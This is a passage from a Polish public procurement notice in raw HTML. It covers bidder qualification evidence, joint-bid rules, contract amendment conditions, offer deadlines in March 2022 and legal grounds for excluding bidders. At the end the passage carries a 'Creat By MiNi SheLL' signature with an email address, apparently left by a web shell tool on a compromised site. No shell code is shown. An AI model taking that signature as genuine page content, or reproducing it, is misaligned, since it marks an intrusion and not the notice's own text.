średniego kursu PLN w stosunku do walut obcych ogłaszanego przez Narodowy Bank Polski (Tabela A kursów średnich walut obcych) w dniu publikacji ogłoszenia w BZP.<br/>3.	Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu polegać na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. <br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. <br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">3) Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania – wzór oświadczenia o niepodleganiu wykluczeniu stanowi Załącznik nr 1a Rozdział I SWZ.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez wykonawcę warunków udziału w<br/>postępowaniu lub kryteriów selekcji dotyczących zdolności technicznej lub zawodowej, zamawiający<br/>żąda następujących podmiotowych środków dowodowych: Wykaz osób, skierowanych przez<br/>wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie<br/>usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich<br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/>/wzór wykazu osób stanowi załącznik nr 1d -Rozdział I SWZ/</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 8. Do oferty należy dołączyć:<br/>1) Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>2) Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>3) Zobowiązani podmiotu trzeciego (jeśli dotoczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) W przypadku, składania wspólnej oferty wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2) Zamawiający nie może wymagać od wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiadania określonej formy prawnej w celu złożenia oferty lub wniosku<br/>o dopuszczenie do udziału w postępowaniu.<br/>3) Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>4) Pełnomocnictwo winno być załączone do oferty.<br/>5) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenie, o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu lub<br/>kryteriów selekcji, w zakresie wskazanym przez zamawiającego. składa każdy z wykonawców.<br/>Oświadczenie to potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, o którym mowa w art.117 ust.4 ustawy Pzp z którego wynika, jaki zakres<br/>przedmiotu zamówienia wykonują poszczególni Wykonawcy.<br/>7) Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje, w celu należytego wykonania przedmiotu umowy, możliwość<br/>zmiany jej postanowień w stosunku do treści oferty Wykonawcy, w tym zmianę terminu<br/>wykonania przedmiotu umowy określonego w § 4 ust. 1 (nie dłużej jednak niż do 30 lipiec 2022<br/>r.)<br/>o ile zostanie spełniony jeden z następujących warunków:<br/>a) w sytuacji obowiązywania stanu zagrożenia w tym stanu wyjątkowego, wojennego, epidemicznego lub stanu epidemii ogłoszonego w związku z COVID-19 lub inną uniemożliwiającego realizację zamówienia;<br/>b) gdy konieczność zmiany jest spowodowana zaistnieniem niezależnych od stron okoliczności,<br/>których nie można było przy dołożeniu należytej staranności przewidzieć w chwili zawarcia<br/>umowy, a które uniemożliwiają prawidłowe wykonanie przedmiotu umowy;<br/>c) utraty przez Zamawiającego źródła finansowania zamówienia w całości lub części, a także<br/>w przypadku przesunięcia źródeł finansowania zamówienia;<br/>d) zmian po zawarciu umowy przepisów prawa lub wprowadzenia nowych przepisów prawa lub<br/>zmiany lub wprowadzenia nowej bezwzględnie obowiązującej normy powodującej konieczność<br/>zmiany, modyfikacji lub odstępstwa w odniesieniu do przedmiotu zamówienia;<br/>e) braku wystarczającej liczby osób do udziału w szkoleniu.<br/>2. Wystąpienie którejkolwiek z wymienionych w ust. 1 okoliczności nie stanowi bezwzględnego<br/>zobowiązania Zamawiającego do dokonania takich zmian, ani nie może stanowić podstawy<br/>roszczeń Wykonawcy do ich dokonania. Ewentualna zmiana umowy nastąpi z uwzględnieniem<br/>wpływu, jaki wywiera wystąpienie okoliczności uzasadniającej modyfikację na dotychczasowy<br/>kształt zobowiązania umownego.<br/>3. Wykonawca może powierzyć wykonanie Przedmiotu umowy innej osobie niż wskazana<br/>w złożonej ofercie tylko po uprzednim uzyskaniu pisemnej zgody Zamawiającego oraz pod<br/>warunkiem, że zastępca spełnia wymagania minimalne określone przez Zamawiającego<br/>w Specyfikacji Warunków Zamówienia w postępowaniu, w wyniku rozstrzygnięcia którego<br/>zawarto niniejszą umowę oraz uzyskałby co najmniej taką samą ocenę co osoba zastępowana w ramach kryteriów oceny ofert dotyczących doświadczenia i wykształcenia osoby pierwotniewskazanej do realizacji zamówienia.<br/>4. Wszelkie zmiany niniejszej umowy wymagają formy pisemnej w postaci aneksu pod rygoremnieważności <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-28 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-28 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-26</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Z postępowania o udzielenie zamówienia wyklucza się, z zastrzeżeniem art. 110 ust. 2 pzp,<br/>Wykonawcę:<br/>1) Będącego osobą fizyczną, którego prawomocnie skazano za przestępstwo:<br/>a. Udziału w zorganizowanej grupie przestępczej albo związku mającym na celu popełnienie<br/>przestępstwa lub przestępstwa skarbowego, o którym mowa w art. 258 Kodeksu karnego.<br/>b. Handlu ludźmi, o którym mowa w art. 189a Kodeksu karnego,<br/>c. O którym mowa w art. 228-230a, art. 250a Kodeksu karnego lub w art. 46 lub<br/>art. 48 ustawy z dnia 25 czerwca 2010 r. o sporcie.<br/>d. Finansowania przestępstwa o charakterze terrorystycznym, o którym mowa w art. 165a<br/>Kodeksu karnego, lub przestępstwo udaremniania lub utrudniania stwierdzenia przestępnego pochodzenia pieniędzy lub ukrywania ich pochodzenia, o którym mowa w art. 299 Kodeksu karnego.<br/>e. O charakterze terrorystycznym, o którym mowa w art. 115 § 20 Kodeksu karnego, lub mające<br/>na celu popełnienia tego przestępstwa,<br/>f. Pracy małoletnich cudzoziemców, o którym mowa w art. 9 ust. 2 ustawy z dnia 15 czerwca<br/>2012 r. o skutkach powierzenia wykonywania pracy cudzoziemcom przebywającym wbrew<br/>przepisom na terytorium Rzeczypospolitej Polskiej.<br/>g. Przeciwko obrotowi gospodarczemu, o którym mowa w art. 296-307 Kodeksu karnego,<br/>przestępstwo oszustwa, o którym mowa w art. 286 Kodeksu karnego, przestępstwo przeciwko<br/>wiarygodności dokumentów, o których mowa w art. 270-277d Kodeksu karnego, lub<br/>przestępstwo skarbowe,<br/>h. O którym mowa w art. 9 ust. 1 i 3 lub art. 10 ustawy z dnia 15 czerwca 2012 r.<br/>o skutkach powierzenia wykonywania pracy cudzoziemcom przebywającym wbrew przepisom<br/>na terytorium Rzeczypospolitej Polskiej<br/>- lub za odpowiedni czyn zabroniony określony w przepisach prawa obcego.<br/>2) Jeżeli urzędującego członka jego organu zarządzającego lub nadzorczego, wspólnika spółki<br/>w spółce jawnej lub partnerskiej albo komplementariusza w spółce komandytowej lub<br/>komandytowo-akcyjnej albo prokurenta prawomocnie skazano na przestępstwo, o którym mowa<br/>w pkt 1,<br/>3) Wobec którego wydano prawomocny wyrok sądu lub ostateczną decyzję administracyjną<br/>o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub<br/>zdrowotne, chyba że wykonawca odpowiednio przed upływem terminu do składania wniosków o<br/>dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert dokonał<br/>płatności należnych podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne<br/>wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłaty tych<br/>należności.<br/>4) Wobec którego orzeczono zakaz ubiegania się o zamówienie publiczne.<br/>5) Jeżeli zamawiający może stwierdzić, na podstawie wiarygodnych przesłanek, że wykonawca zawarł z innymi wykonawcami porozumienie mające na celu zakłócenie konkurencji, w szczególności jeżeli należąc do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16<br/>lutego 2007 r. o ochronie konkurencji i konsumentów, chyba że spowodowane tym zakłócenie<br/>konkurencji może być wyeliminowane w inny sposób niż przez wykluczenie wykonawcy<br/>z udziału w postępowaniu o udzielenie zamówienia.<br/>6) Jeżeli, w przypadku, o których mowa w art. 85 ust. 1, doszło do zakłócenia konkurencji<br/>wynikającego z wcześniejszego zaangażowania tego wykonawcy lub podmiotu, który należy<br/>z wykonawcą do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r.<br/>o ochronie konkurencji i konsumentów, chyba że spowodowane tym zakłócenie konkurencji<br/>może być wyeliminowane w inny sposób niż przez wykluczenie wykonawcy z udziału w postępowaniu o udzielenie zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com